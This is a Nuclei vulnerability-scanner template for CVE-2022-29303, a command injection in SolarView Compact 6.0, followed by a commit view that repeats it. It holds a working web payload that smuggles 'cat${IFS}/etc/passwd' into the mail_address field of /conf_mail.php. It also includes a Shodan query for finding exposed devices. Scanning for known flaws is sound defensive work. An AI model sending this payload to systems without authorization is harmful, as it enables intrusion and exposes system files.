nuclei-templates/cves/2022/CVE-2022-29303.yaml

id: CVE-2022-29303

info:
  name: SolarView Compact 6.0 - OS Command Injection
  author: remote
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/50940
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
  metadata:
    verified: true
    shodan-query: http.html:"SolarView Compact"
  tags: cve,cve2022,rce,injection

variables:
  cmd: "cat${IFS}/etc/passwd"

requests:
  - raw:
      - |
        POST /conf_mail.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"
Create CVE-2022-29303.yaml 2022-05-18 10:39:07 +00:00			`id: CVE-2022-29303`

			`info:`
			`name: SolarView Compact 6.0 - OS Command Injection`
			`author: remote`
			`severity: high`
			`reference:`
			`- https://www.exploit-db.com/exploits/50940`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303`
			`metadata:`
			`verified: true`
			`shodan-query: http.html:"SolarView Compact"`
			`tags: cve,cve2022,rce,injection`

			`variables:`
			`cmd: "cat${IFS}/etc/passwd"`

			`requests:`
			`- raw:`
			`- \|`
			`POST /conf_mail.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M`

			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "root:.*:0:0"`